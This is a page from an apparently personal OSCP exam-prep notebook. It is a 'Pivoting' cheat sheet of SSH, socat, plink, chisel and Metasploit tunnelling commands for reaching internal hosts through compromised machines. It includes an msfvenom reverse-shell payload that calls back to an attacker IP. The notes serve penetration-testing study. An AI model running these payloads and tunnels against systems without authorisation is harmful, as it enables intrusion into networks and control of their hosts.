OSCP
  • All About OSCP
  • OSCP- One Page Repository
  • About the Author
  • Basic Linux & Windows Commands
    • Linux Commands
    • Windows
      • cmd
      • Powershell
      • Basics of windows
    • Linux / WindowsMain commands
    • Bash Scripting
  • Recon (Scanning & Enumeration)
    • Active Info Gathering
      • My Network Recon Checklist
      • My Web Recon Checklist
      • Network Enumeration
      • Port Scanning
    • Common Ports and Services
      • Other Services Enumeration
    • DNS Zone Transfer Attack
    • SNMP Enumeration
    • SMB Enumeration
    • Web Application Directory bruteforcing / fingerprinting
    • Port & Services Scanning
  • Web Application
    • My checklist
      • LFI
      • RFI
      • SQLI
    • File Upload bypass
    • Enumeration and Exploitation
    • No-Sql Injection
    • SQL Injection
    • Hidden Files and directories
    • RFI
    • LFI
  • Brute Force
    • Reuse the hash
    • Password Crack
  • Shells
    • Linux Reverse Shell [One liner]
    • Reverse Shell to fully interactive
    • Reverse Shell Cheat Sheet
    • WebShell
  • Transferring files
    • My Checklist
    • Transfer files on linux
  • Priv Escalation
    • Linux Priv Escalation
      • g0tmi1k linux privilege escalation
      • Privilege Escalation - Linux
      • Checklist - Linux Privilege Escalation
    • Windows Priv Escalation
      • Fuzzysecurity window priv escalation
      • Privilege Escalation - Windows
      • Checklist - Local Windows Privilege Escalation
  • Post Exploitation
    • Cover your tracks
    • Persistence
    • Loot Linux
    • Loot Windows
    • Escaping Restricted Shell
    • Meterpreter shell for post-exploitation
    • Spawn Shell
  • Pivoting
    • My Checklist for Pivoting
    • Tunneling and Port Forwarding
    • Pivotind understanding
  • Buffer Overflow
    • Buffer overflow
    • Buffer overflow Step by Step
      • Study about buffer overflow
      • Brainpan
      • VulnServer
      • Minishare
  • Main Tools
  • MISC
    • Exploit Compiling
  • CheatSheet (Short)
  • OSCP/ Vulnhub Practice learning
    • Machines Practice
    • My Practice on HTB Windows boxes
    • My Practice on Vulnhub boxes
    • Over the Wire (Natas)
    • Over The wire (Bandit)
Powered by GitBook
On this page

Was this helpful?

Pivoting

Local port forwarding
Forward local port to remote host
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

Remote port forwarding
Forward remote port to local host
ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Dynamic port
ssh -D <local proxy port> -p <remote port> <target>

SOCAT

socat file:`tty`,raw,echo=0 tcp-listen:8989

PORT FORWARDING "port to port":

----MSF---- Most platforms

Forward: Get meterpreter session on one of the dual homed machines portfwd add -l 4445 -p 4443 -r ip Use -R to make it reverse

----SSH---- For Linux

~C "if you already have an SSH session"

-R 8081:ip:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)

:8081<------------:80 Now you can access 172.24.0.2:80, which you didn't have direct access to

-L 8083:ip:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)

:8084<------------:8083<------------:XXXX run nc on port 8084, and if ip:8083 receives a reverse shell, you will get it

For reverse shell: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell Run it on 2nd remote target to get a shell on Kali

Or if you didn't have an SSH session, then SSH to your Kali from target machine: On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd" ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1

---PLINK---- Just like SSH, on Windows service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine

On Target: plink.exe ip -P 22 -C -N -L 0.0.0.0:4445:ip:4443 -l KALIUSER -pw PASS

---SOCAT---- For linux

Forward your 8083 to ip:443 ./socat TCP4-LISTEN:8083,fork TCP4:ip:443

---CHISEL---- Most platforms

Remote static tunnels "port to port":

On Kali "reverse proxy listener": ./chisel server -p 8000 -reverse

General command: ./chisel client : L/R:[YOUR LOCAL IP]:::

Remote tunnels "access IP:PORT you couldn't access before": On Target: ./chisel client ip:8000 R:127.0.0.1:8001:172.19.0.3:80

Local tunnels "listen on the target for something, and send it to us": On Target: ./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003

DYNAMIC "port to any": setup proxychains with socks5 on 127.0.0.1:1080 Or set up socks5 proxy on firefox For nmap use -Pn -sT or use tcp scanner in msf

----MSF---- Most platforms

Get meterpreter session on one of the dual homed machines Auto route to ip (multi/manage/autoroute) Start socks proxy (auxiliary/server/socks4a)

----SSH---- For Linux

-D1080

---PLINK--- Just like SSH, on Windows

On Target: plink.exe ip -P 22 -C -N -D 1080 -l KALIUSER -pw PASS

---CHISEL---- Most platforms

On Kali: ./chisel server -p 8000 -reverse

On Target: ./chisel client ip:8000 R:8001:127.0.0.1:1080 ./chisel server -p 8001 --socks5

On Kali: ./chisel client 127.0.0.1:8001 socks

PreviousSpawn ShellNextMy Checklist for Pivoting

Last updated 4 years ago

Was this helpful?